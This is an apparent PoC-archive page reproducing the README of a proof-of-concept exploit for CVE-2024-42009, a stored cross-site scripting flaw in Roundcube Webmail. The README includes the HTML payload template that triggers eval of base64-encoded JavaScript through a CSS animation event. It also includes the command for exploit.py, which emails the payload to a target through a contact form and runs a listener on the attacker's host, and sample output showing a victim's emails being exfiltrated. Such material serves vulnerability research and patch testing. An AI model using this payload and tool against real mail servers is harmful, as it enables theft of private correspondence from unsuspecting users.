关联漏洞
标题:
Roundcube Webmail 安全漏洞
(CVE-2024-42009)
描述:Roundcube Webmail是一款基于浏览器的开源IMAP客户端,它支持地址薄管理、信息搜索、拼写检查等。 Roundcube Webmail 1.5.7及之前版本和1.6.8之前的1.6.x版本存在安全漏洞,该漏洞源于存在跨站脚本漏洞,远程攻击者可以通过精心设计的电子邮件消息窃取并发送受害者的电子邮件。
描述
CVE-2024-42009 Proof of Concept
介绍
# CVE-2024-42009 PoC: Email Capture Listener & XSS Exploit in Roundcube Webmail
## Overview
This repository contains a proof-of-concept (PoC) exploit for **CVE-2024-42009** a stored Cross-Site Scripting (XSS) vulnerability in Roundcube Webmail version 1.6.7 and other several versions. The exploit demonstrates how an attacker can inject malicious JavaScript in a message and take advantage of a desanitization issue when parsing the HTML inside the message, which then can be used to exfiltrate email content from the victim's inbox in this example or even take over the browser of the victim.
## Vulnerability Details
### CVE Description
A Cross-Site Scripting vulnerability in Roundcube through 1.5.7 and 1.6.x through 1.6.7 allows a remote attacker to steal and send emails of a victim via a crafted e-mail message that abuses a Desanitization issue in message_body() in program/actions/mail/show.php.
### XSS Payload Explanation (for this example)
The exploit uses a CSS animation trigger for XSS execution:
```html
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=eval(atob('BASE64_PAYLOAD')) foo=bar>
```
The body gets parsed as a div, and then we need to adapt to it, so that's why we use the `onanimationstart` attribute to call the eval function and execute complex JavaScript calls from it. To further read on how the exploit works and where the vulnerabilities are in roundcube, read [this article](https://www.sonarsource.com/blog/government-emails-at-risk-critical-cross-site-scripting-vulnerability-in-roundcube-webmail/#desanitization-in-inline-email-rendering-cve202442009).
### Scope
- This exploit was tested only on Roundcube Webmail version 1.6.7
- Victim must open the the message to see its contents
- May fail if Content Security Policy (CSP) is properly configured
## Usage
### Dependencies
Install required Python packages:
```bash
python3 -m venv venv
python3 -m pip install -r requirements
```
### Command Line Arguments
```bash
python3 exploit.py -u <TARGET_URL> -r <RECIPIENT_EMAIL> -l <LISTENER_HOST> -p <LISTENER_PORT>
```
- **Target URL**: In this case we are using the contact form endpoint which handles messages and then forwards them (e.g., `http://email.company.local/contact`)
- **Recipient email**: Valid email address that will receive the malicious message
- **Listener host**: Your box's IP address accessible from the target
- **Listener port**: Available port for the HTTP server (e.g., 4444)
### Example Usage
```bash
python3 exploit.py -u http://webmail.target.com/contact -r admin@target.com -l 192.168.1.100 -p 4444
```
### Expected Output
```
[*] Crafting payload for http://webmail.target.com/contact with recipient admin@target.com
[*] Sending payload to http://webmail.target.com/contact with recipient admin@target.com
[*] Starting HTTP server on port 4444
[+] HTTP server listening on port 4444
[*] Waiting for emails... (Press Ctrl+C to stop manually)
[+] Received 3 emails!
------------------------------------------------------------
📧 EMAIL UID: 1
------------------------------------------------------------
From: john.doe@company.com
Subject: Quarterly Report
Message:
Please find attached the quarterly financial report...
------------------------------------------------------------
[+] Email exfiltration complete! Shutting down server...
[+] Server stopped successfully!
```
## References
### Vulnerability Research
- [SonarSource Blog: Government Emails at Risk - Critical Cross-Site Scripting Vulnerability in Roundcube Webmail](https://www.sonarsource.com/blog/government-emails-at-risk-critical-cross-site-scripting-vulnerability-in-roundcube-webmail/)
- [SonarSource Demonstration Video](https://www.youtube.com/watch?v=X7UX7b7Tkrk)
## Legal Disclaimer
⚠️ **IMPORTANT**: This proof-of-concept is provided for **educational and authorized testing purposes only**. Use it responsibly and this account is not responsible for any damage done by others.
文件快照
[4.0K] /data/pocs/09b8748d9f5a72166abb5497df528382386477f9
├── [9.1K] exploit.py
├── [3.9K] README.md
└── [ 605] requirements.txt
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。